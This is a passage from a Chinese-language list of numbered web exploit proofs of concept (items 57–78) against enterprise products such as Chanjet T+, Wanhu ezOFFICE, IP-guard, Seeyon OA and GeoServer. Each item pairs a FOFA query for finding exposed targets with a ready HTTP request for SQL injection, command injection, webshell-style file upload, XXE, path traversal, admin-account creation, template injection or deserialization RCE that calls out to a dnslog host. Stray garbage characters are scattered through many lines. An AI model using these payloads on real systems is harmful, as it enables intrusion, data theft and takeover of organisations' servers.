"MethodName":"Start",
. w W; |- b0 C* e# B$ o* | "ObjectInstance":{
6 f8 Z: ^, ]3 ]5 q# j! B8 o "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",- ^! @ ]0 v q n# `6 f4 @
"StartInfo": {* H: A" b# q- t# o; I
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
" D' I' `2 V; U6 e1 W" v. A8 N0 a "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"5 Q, m9 x1 U4 [/ `( n! V
}
$ b* i, ?5 M# j7 ~5 f/ J }5 o6 J- J' k* g$ J h J1 |) r/ x1 O
}+ w1 `, |' k9 |6 ^" u6 o" K
}
* W4 x* i' G6 w3 d9 d
; H- u) D3 D3 W& [, m
/ \+ f: y+ l7 b6 f7 }5 M0 P. T9 t57. 畅捷通T+ keyEdit.aspx SQL注入! V/ ^+ V& e' K7 q! y0 \% E
FOFA:app="畅捷通-TPlus"- W9 R2 v3 s1 x$ V3 L8 V
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.18 `1 O" s& g, U5 S* ?3 } l/ b
Host: host
9 R' S% q. L# J$ X% H/ H0 |0 u+ L6 eUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36( w2 [7 c' z" C9 }+ o% A9 w( D
Accept-Charset: utf-8. x1 e' x$ A6 G4 s7 \
Accept-Encoding: gzip, deflate
& c" b8 D9 F! ` P5 w! W. HConnection: close
( Q" K q! F/ f+ V/ o5 z( u6 ^( o, Z4 Q4 H Y( z% g- @% U8 ^
$ s7 t" r- Y q' s58. 畅捷通T+ KeyInfoList.aspx sql注入1 R/ m2 Y6 c/ c6 q( I3 ^6 o& l
FOFA:app="畅捷通-TPlus"
1 y# M' E, B7 Q* t$ U! w- lGET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1$ C9 @9 S5 y/ t
Host: your-ip
b; q6 A% j3 `4 v( w/ jUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36: [6 S! q# O0 N* ]$ O. r; o
Accept-Charset: utf-8
4 ?$ u' ?9 ^2 }( lAccept-Encoding: gzip, deflate: ?8 c! q! b! \8 v+ ^ k
Connection: close
. P# P6 s* C! a3 @5 c( l8 [( Z
* v7 A: G5 T e6 L" y/ K+ o
2 Y6 R0 I: z4 k59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行4 y1 m; v* O* E' t7 R/ u" i3 d
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
2 x' H4 T; U2 i* XPOST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
6 F) P* Y: T' q" j1 [Host: 192.168.86.128:90908 O, `7 [9 \/ f7 f- ~
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
; {+ n( x( H) }8 Z) i# O! a$ EConnection: close
' u1 _6 C0 `: mContent-Length: 1669
( D9 _7 S' T) a$ |, [, o4 RAccept: */*& x$ ~& S/ j% d; X0 @& A
Accept-Language: en
; O* P9 |; p' I" ?Content-Type: application/x-www-form-urlencoded6 R7 Q3 c8 j. h) d7 l' ~8 j) w
Accept-Encoding: gzip- c1 n4 w0 X; _" S1 c
' b# y6 b# s; _( TPAYLOAD
" D8 k8 S! a; G: x! U' J) h2 y$ W2 J7 }
1 ]/ J3 V: ~, X* v" W
60. 百卓Smart管理平台 importexport.php SQL注入, A- ?" u2 P* `& f- z" Y8 Q$ U
FOFA:title="Smart管理平台") W( M' Z# X% _- q4 _
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
* D& M$ c- H! V" }8 H. ?5 PHost:
6 P3 K! R" i WUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36+ c5 }: q% B8 F: c* H' j' C f
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.74 b& p3 s% z7 R# h9 H
Accept-Encoding: gzip, deflate5 Z: c7 l( Y* t& T) Z% ^0 R
Accept-Language: zh-CN,zh;q=0.9
: B& r7 O: T" f0 E9 E% D4 L) MConnection: close( P+ O7 K7 t; A# a7 l, D
& @& [, ]8 O. A9 T- H- Y( v5 V1 ^2 Z' B$ i4 @
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
. A+ j" @5 ?$ ^. {; cFOFA: title="欢迎使用浙大恩特客户资源管理系统"
+ [1 q6 Z. N' j) LPOST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
/ T( b9 |1 {- DHost: x.x.x.x
2 r4 @2 |' ?. s4 ^" @4 ~" X! FUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15( X+ k9 t% {! G7 P- N% F
Connection: close
( n j6 [; f b7 y, ^9 B3 HContent-Length: 27
. V6 L6 i$ F- a0 bAccept: */*
* X- L/ U/ o! ^Accept-Encoding: gzip, deflate
# N7 _0 W; J$ N5 s% q2 BAccept-Language: en1 ?% Q& i0 [+ ]3 @3 r" m) R# ^5 ~
Content-Type: application/x-www-form-urlencoded
8 _8 H+ h0 M% J7 V+ B6 K, F- u. H9 ]* j/ L: T& Y
8uxssX66eqrqtKObcVa0kid98xa9 H( d6 k/ {/ O7 n e& v8 z. J
1 ~0 v0 v. y% w& x/ l6 G4 O5 A
3 h4 }# V& E' W3 R
62. IP-guard WebServer 远程命令执行
2 E! U- m8 l& z5 k, w" F# kFOFA:"IP-guard" && icon_hash="2030860561"7 N8 s7 G& y/ |9 r2 d: y
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
+ J5 H* e! D# {- ?1 BHost: x.x.x.x$ Y) P6 N$ b$ F, ?" z# s
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
9 ^4 y% w/ p. @* }0 o( g; i! P! f0 hConnection: close
. e- R" ^/ n8 Q+ }Accept: */*
4 ]8 V! P' h# o( \( `2 G6 uAccept-Language: en
% X& X9 ?8 Y, h" @7 U6 z9 E! HAccept-Encoding: gzip$ J# V. H$ c) x% F+ G
9 @' i: |% @$ E8 e- s, g, q# w6 g( x" L& k- Q# t
访问: A- F% S2 T% }: [( @
8 c6 O- J/ A Q8 U' pGET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.10 I9 Z5 m6 a) K. T3 r
Host: x.x.x.x
+ o2 e' q+ u4 N+ m( m; Z7 A3 e8 m0 T( D
' C* J5 J: s) S3 U \63. IP-guard WebServer任意文件读取3 J# v: Y$ Y( l9 b$ C" O
IP-guard < 4.82.0609.0
9 Z0 b1 I1 `/ |FOFA:icon_hash="2030860561"
! r) u9 T3 ?" q% S* c9 iPOST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
( ]; C$ S# G% _7 uHost: your-ip9 y5 j* [) z8 @/ x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36! \; i: l' r% o8 O3 Y* E
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.75 Z- o" h d$ B& `
Accept-Encoding: gzip, deflate8 Z9 `* `. \/ V+ y- G3 n
Accept-Language: zh-CN,zh;q=0.9$ w2 I9 e) B' A$ U
Connection: close1 w+ b# j1 D- ]3 i
Content-Type: application/x-www-form-urlencoded
+ {! D$ L3 V8 }2 h+ Y( N$ c$ A
4 R+ v5 T7 p; [& ^# E. Y6 _8 vpath=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A0 j/ B; m, a" E; o2 f
) b, F, f* h9 L$ ^ Z
64. 捷诚管理信息系统CWSFinanceCommon SQL注入
7 X- T. b; A! X' Z8 J- H. {FOFA:body="/Scripts/EnjoyMsg.js"& I+ O: D2 u5 | }4 l- K% q
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.10 O0 c* I7 E7 c5 _0 h, p: N/ Z0 B8 g
Host: 192.168.86.128:9001
a0 P0 p+ _+ r V/ K' {: cUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
1 D! R3 @# t3 v9 F# F5 r# NConnection: close# o9 ]/ o1 T& D: |6 y3 ?
Content-Length: 369
0 J4 E" \4 A% R. z4 ]Accept: */*
5 x, Z1 [6 i, m) B) p/ R- t+ }2 ~Accept-Language: en
+ m9 f+ U U5 N: W- ]- S5 `/ nContent-Type: text/xml; charset=utf-80 u$ @2 m5 M8 |3 R
Accept-Encoding: gzip( f, B# u* o4 B5 _
1 v+ I7 \- s# x8 q2 W<?xml version="1.0" encoding="utf-8"?>: f ~/ A* }7 W' L
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">- g7 {6 K: X0 D& V# o
<soap:Body>
1 V- y) p2 S# K <GetOSpById xmlns="http://tempuri.org/">
( v3 P4 S' H) E ^4 o <sId>1';waitfor delay '0:0:5'--+</sId>
$ X0 X+ `6 `! R+ } </GetOSpById>* k, x# f" b" }3 l# H
</soap:Body>
+ O! s4 v& K9 q P5 U2 L* ?</soap:Envelope>% Z* W6 t' G5 o7 J& e; N
, ]+ I, D6 O8 f A
1 l- x* V- ^% r8 t; h65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过& q6 k6 w m3 E$ u5 e2 n
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
$ i' [& f1 q7 [' A响应200即成功创建账号test123456/123456
- }7 n0 I; P3 p1 V4 c2 T! uPOST /SystemMng.ashx HTTP/1.1
8 @4 @* n7 s' R/ K$ T4 B+ F/ W( KHost:
3 {( _! f* q, Q9 `4 J6 _0 |User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
! ?. ~, e0 A# K5 f3 m7 ~! eAccept-Encoding: gzip, deflate$ `: s$ X: l* M _ R2 w- l
Accept: */*
0 Y2 l* R4 z) V: ~) KConnection: close4 e0 U8 v1 c4 I
Accept-Language: en& t( |7 a( O5 M$ ^: h
Content-Length: 174
- c T4 p7 J9 E% z: z, i- W5 H+ r5 o0 i: @+ J
operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators
7 d) s8 O. S' [ ~! t. S6 i9 Y
* q j6 W! o: ?! n* v* S K
. i3 ?( I0 O( x0 J: G66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
1 f( }& n7 p+ u ~# tFOFA:app="万户ezOFFICE协同管理平台"
0 i+ B& E- F% ?% A6 T2 X @9 I8 h ~) f; N
GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
V6 t6 o6 Z9 a/ d/ K9 OHost: x.x.x.x7 @4 y# `8 X+ |' K+ c5 X! p0 X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
0 x7 w, o8 G* k; _. P* WConnection: close
7 q" M y e P+ @9 hAccept: */*, }1 j% h8 b* ?& t' \3 ~6 |( n
Accept-Language: en
, @5 C2 Y2 D; w! PAccept-Encoding: gzip8 y; [! m) Y1 w% }5 }& K w4 U0 V
5 ?5 T8 D# ?' K! p# z' D7 O, M* ^
" b; D* `& y" @- P$ P4 E第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在- X; O9 A; S" P8 S: J& f% ]
: O+ ^% \$ {4 v/ ^: F
67. 万户ezOFFICE wpsservlet任意文件上传
% Q3 d, r# R. m) XFOFA:app="万户网络-ezOFFICE"
6 A. [6 r# o: j+ n# D2 X" A8 znewdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型
/ F' {$ r) t/ }0 g* l* V. s6 t/ EPOST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
# v1 j! Z$ i4 ]Host: x.x.x.x
. Z1 _3 W& S AUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0! S6 Q; }' x7 ?/ I, {; Z
Content-Length: 173
: B, K2 u0 E. z, L, j) ?) FAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
) b4 O1 [" k O. F6 j- T7 EAccept-Encoding: gzip, deflate
0 z- [; Q: t/ x, Z/ v/ A. ZAccept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.30 _* H( l4 ?$ I9 c$ Y
Connection: close7 G5 S+ C" Z/ \: v# F0 s% ~/ N
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
+ u% t4 C' x" ODNT: 1
$ U+ u _, ~% Y- _Upgrade-Insecure-Requests: 1
, y2 N+ c/ O3 W# a' j
" g: t' T" W6 X3 o5 E% P6 ?/ d--ufuadpxathqvxfqnuyuqaozvseiueerp0 M& ], H3 {0 s$ v' }% v
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"
! {. b9 }6 Y, B' p( u
+ k" h- A+ q O9 q' [<% out.print("sasdfghjkj");%>
- Z. V1 ^! H) C" M7 v5 o--ufuadpxathqvxfqnuyuqaozvseiueerp--
3 z9 Y; Y; O# |/ @- \+ l- ^/ r" k* i* y
6 M+ D( k9 G' ~; C2 p$ H
文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp1 N# \9 U: | ]2 V. q& E
: ?4 a: y3 B) C5 \ B ?3 B68. 万户ezOFFICE wf_printnum.jsp SQL注入
- v" {; b! ?8 y0 Y: j* aFOFA:app="万户ezOFFICE协同管理平台"
/ }8 w% x A" O: s9 _0 OGET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Y9 S" x" g3 p1 R% h$ KHost: {{host}}
" v) ]% I: u, z7 f5 `& J7 s0 qUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36- [: t( [- s' r/ k0 ^7 E
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8' R( l0 L4 I* l8 y% _8 y
Accept-Encoding: gzip, deflate
1 ]8 t/ {0 i' o2 s8 _Accept-Language: zh-CN,zh;q=0.9
' e/ q% ?2 x# n/ r5 u; t! r, oConnection: close
! k3 }1 F. N- }' g/ P6 h/ M
$ U' n6 F$ o! w8 A# \: R
$ g5 m4 V* y) n% X5 ]2 o69. 万户 ezOFFICE contract_gd.jsp SQL注入
* @( {* H, s' D5 r+ U2 m& `8 dFOFA:app="万户ezOFFICE协同管理平台"0 e8 x* a! @" V R8 j0 z7 \; \9 P5 z
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
) [3 x2 N! Z9 {5 n( V6 LHost: your-ip* o+ W' M( L+ [- @& u
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.360 E2 S, U! o( D! x9 Y/ S
Accept-Encoding: gzip, deflate
$ I/ N% c1 M+ M: l# e; BAccept: */*/ m. s* M/ O4 i2 O
Connection: keep-alive
" U/ n# L3 F* d8 A1 N: i9 Z8 a( }2 J' _1 c1 B1 {) M
- O9 H' J, s" }) B( w" c' r7 @2 `
70. 万户ezEIP success 命令执行
8 ^2 D6 q1 F# G$ f$ C+ HFOFA:app="万户网络-ezEIP") ^* M8 R. }4 ?6 p8 |; S8 z( ?
POST /member/success.aspx HTTP/1.1
) k# E) U5 l- OHost: {{Hostname}}) I; @6 q6 v% t
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.360 Z) P3 }6 b% S) G1 s
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
1 X! r: E! A1 C- O. B, AContent-Type: application/x-www-form-urlencoded
3 D+ h* Q# d5 q1 t* a) JTYPE: C3 d0 q: C4 a6 K9 @' \8 t0 S- }: C
Content-Length: 16702
* M! @% v% s3 }
( m& l, B4 h: W__VIEWSTATE=PAYLOAD
3 e5 B; P. q- a' x
, t( Y# W b1 Z; [+ H/ s, s3 I+ J7 J( v9 Z; ]
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
, p; D3 a+ |7 z( \( x i7 r; c9 mFOFA:body="PM2项目管理系统BS版增强工具.zip"
0 h% `' z$ s2 F9 u. d! sGET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.15 m0 u) g; |4 \! S7 [4 f+ ?
Host: x.x.x.xx.x.x.x& q# t: J- M- D2 w* v9 B
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36% _! n% c+ f+ F! D1 d
Connection: close
a! D X# M5 l( d+ k+ FAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8) Q* K/ c% x9 e2 [
Accept-Encoding: gzip, deflate+ L |. N+ v) o8 q0 {, Y
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
. k' s( k& U. {' ]Upgrade-Insecure-Requests: 1. f3 G5 S' U" P' c5 L
' F5 B7 t6 S2 A$ A
! S, D% f/ ]( D* ^
72. 致远OA getAjaxDataServlet XXE
' O) h* Y: _6 o- T: O8 G; Y1 t. }+ PFOFA:app="致远互联-OA"
. z+ L5 W! |- y/ f7 v3 l4 XPOST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1+ Z0 ~: a5 D: |- z/ {- G
Host: 192.168.40.131:8099
. F' j- \9 C N6 `User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
3 v- a% B9 m7 ^7 \4 SConnection: close
/ J3 Q: \5 R4 @Content-Length: 583: W( @/ M; |" v5 }5 Z. V
Content-Type: application/x-www-form-urlencoded, I8 M, R- R% w8 I" L* O1 y
Accept-Encoding: gzip8 H) y" A! j, L2 z& P% q
# O4 U9 J/ [6 @: ^, s7 d0 f7 [S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E3 ~9 e3 y- @ n; L `: T
! ~4 v) v+ f" l9 F9 q
& _3 z J( o/ `9 L73. GeoServer wms远程代码执行
& z4 i; G: `0 q `0 M+ QFOFA:icon_hash=”97540678”0 U& t9 s% I+ `; q% g- Q) [
POST /geoserver/wms HTTP/1.1
" J5 r7 C2 o: ^Host:
; E Y' M; y5 }User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.361 J$ H, J/ @0 F
Content-Length: 1981# p: N- q. }9 E8 S; d
Accept-Encoding: gzip, deflate' j0 @ k6 Q7 }3 E; ?: _; D& N( F
Connection: close
: r5 t! Q2 D7 W4 [Content-Type: application/xml% }5 v9 A7 O% [
SL-CE-SUID: 3
9 w" f) o7 O( Z9 C% b; u+ h" o. o+ K6 R& k0 G3 M% A3 j0 w7 Z r# \
PAYLOAD
+ W6 G, Z- [) R6 l- [5 O& ^
, H, }2 D& b& d6 h- ?% y: ~& v: v) x6 J& }" }5 x% e
74. 致远M3-server 6_1sp1 反序列化RCE
( B6 q+ v& u/ L3 g. V- H2 y% Z9 r& gFOFA:title="M3-Server"% {2 m0 D( M1 V- J0 y, |
PAYLOAD# ]# I% Q* p& {7 @: b( a% `' q
' D& i$ a- |# i* C8 Y" G7 {
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE! u" ]! f- i# T) H: b Q
FOFA:app="TELESQUARE-TLR-2005KSH"
) \7 z) ?! o3 Z' A( A4 FGET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.15 P& a. @$ O! K$ ~
Host: x.x.x.x. l2 ]& r4 H- Z8 A- E! E9 a+ X+ m
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
) Q m( @& N# | B ^$ QConnection: close
& x. }+ q' H! U( B8 X+ s8 R& WAccept: */*! s" [" X5 Y6 z& u3 t9 v
Accept-Language: en- a" Q% e; K+ j
Accept-Encoding: gzip
& O) _# Y+ h8 S r" Z
1 q) o" i/ a3 r6 }2 n$ w7 B+ M7 a3 T; v5 n
GET /cgi-bin/test28256.txt HTTP/1.1
$ w l1 C. g) l3 [+ ]Host: x.x.x.x
5 x+ ^) V0 |: L$ G9 R3 n0 n# _! z1 R/ h& x
0 ]: D g8 Y& i f1 @
76. 新开普掌上校园服务管理平台service.action远程命令执行
: B$ S; V2 t. M( r8 O: }2 Y Q$ gFOFA:title="掌上校园服务管理平台"
- M( k3 z( D. q" u' t( I5 w( [/ UPOST /service_transport/service.action HTTP/1.18 t+ d- P/ u2 o+ |0 e- r8 o
Host: x.x.x.x
) z! u9 z" N- |User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
" l5 K T5 M* W1 n$ W+ z9 VConnection: close5 F& r+ {$ B, T1 ]3 p1 R, _
Content-Length: 211. E+ U* @# A8 C# m4 W1 f' P' U
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8" q; i2 R0 P9 r5 b' U
Accept-Encoding: gzip, deflate
0 q) T1 V. G" L" JAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2* r2 i0 u6 Q! L j, @( }: q; N1 s3 ~
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4. [9 H- x+ v4 y3 I: L {! J
Upgrade-Insecure-Requests: 1: n4 |# U0 Z# y9 M5 q' U' B
. B e p1 f% F" {* |# K
{' u4 O n8 ?" m! u$ m. ?, k# {
"command": "GetFZinfo", q. ~6 h# T1 \% S3 W. c
"UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"3 X# Q1 Q/ k; u
?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
" n! a k9 L# z4 e# |1 G}7 L1 L. S9 p, g6 [0 g( F6 A. u2 g
- y" f; N# i+ ^4 P" h9 Y O
/ I" H6 T6 z) Y& t
GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
6 |$ n6 h: S1 O4 ^: aHost: x.x.x.x
: t5 E$ [; x5 G5 Y. z
) }& K/ L8 E- }$ z3 E% w( K
. G5 q/ Q4 M& _2 `$ q% Z: Z" }1 l" m, O
77. F22服装管理软件系统UploadHandler.ashx任意文件上传/ M' }8 I; }, m! z" l( q& }
FOFA:body="F22WEB登陆"5 w: M x% E( N6 o4 j
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
6 E+ m9 C' l5 ]9 F3 ]Host: x.x.x.x( ` K+ A& B% m; h6 U4 X- a& y
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36: }3 {2 u& @5 I& i. t. L
Connection: close9 P/ J. C) D" m7 R- O
Content-Length: 433
) c$ t* ?( L: h( GAccept: */*
; \' I; d, z+ y( XAccept-Encoding: gzip, deflate
- d% r; b/ v/ n' \0 u9 dAccept-Language: zh-CN,zh;q=0.99 _8 [" r9 h9 }& b8 G9 E
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix$ {) I, B3 X+ Q. S0 N8 J
4 f) {" ` N7 O7 ~( W' H------------398jnjVTTlDVXHlE7yYnfwBoix
$ N4 G6 [' R( O8 t2 Q6 R7 kContent-Disposition: form-data; name="folder"
3 @1 Y, O6 j( d: q" T3 M0 @/ N- H/ w' J, v2 W
/upload/udplog
' g, z' E) ~* {, Y/ `------------398jnjVTTlDVXHlE7yYnfwBoix$ p. q* V! F# W8 I0 g+ R# \* K
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
0 I) V) f8 G' M( P9 OContent-Type: application/octet-stream! P7 r( |& P. i, I3 m" }, M
4 ^4 l9 t! A4 Xhello1234567
9 Y- x! ?" j4 K9 N4 |- \------------398jnjVTTlDVXHlE7yYnfwBoix7 W- z& ^% ]' W; m
Content-Disposition: form-data; name="Upload"- J' Y0 t3 _: T0 U
7 Q/ P1 b# C8 E- p+ ESubmit Query
) Y0 q3 X; X* S------------398jnjVTTlDVXHlE7yYnfwBoix--
6 j6 ^' |; H1 _2 j' _* ^) L% p) ]
' ?( |/ V9 n/ U, _
) C' q2 S; { R78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传7 Y/ h# J, X5 x2 J- O; B* c
FOFA:icon_hash="2001627082"
9 J. N4 |% g; n; f1 T- l$ {2 ]% HPOST /Platform/System/FileUpload.ashx HTTP/1.1
4 B' d; M: Z7 U$ p# jHost: x.x.x.x
- N$ [4 Z) s; N; L& IUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
( _7 A+ s' ?7 a Q8 g; _Connection: close1 L! s* F1 |' N
Content-Length: 3361 K( j0 U; u. I1 k N6 M+ q
Accept-Encoding: gzip
- m7 _) a/ |; N7 L( F" w- fContent-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l
) i4 W8 \) ?$ x8 T6 ]7 B& u: B8 I. j6 m3 C: x% l; O# Q9 {
------YsOxWxSvj1KyZow1PTsh98fdu6l
3 ]' e- B' ?! B3 W6 {8 { j9 d* k. ZContent-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
- \0 G9 S1 t7 q! g. r$ l) f2 LContent-Type: image/png Z7 O# j! }: ?+ \
# i, @1 ]7 X6 [- U
YsOxWxSvj1KyZow1PTsh98fdu6l
& G1 Z0 k S* q8 S" v: R5 c" N$ z, z------YsOxWxSvj1KyZow1PTsh98fdu6l
. x& M5 C* }; @3 Q' ^: u5 Z, a8 DContent-Disposition: form-data; name="target"
, c& t( G# t- n4 o* M% o v4 a& F4 G+ `6 U
3 |: v& h% ~% [: v# P* h6 |* I/Applications/SkillDevelopAndEHS/
# I. e8 m* O( X! V8 {3 \------YsOxWxSvj1KyZow1PTsh98fdu6l--
/ n3 F9 t* h6 A6 a; L! y# Q! y q/ {9 a+ Q6 ]0 _
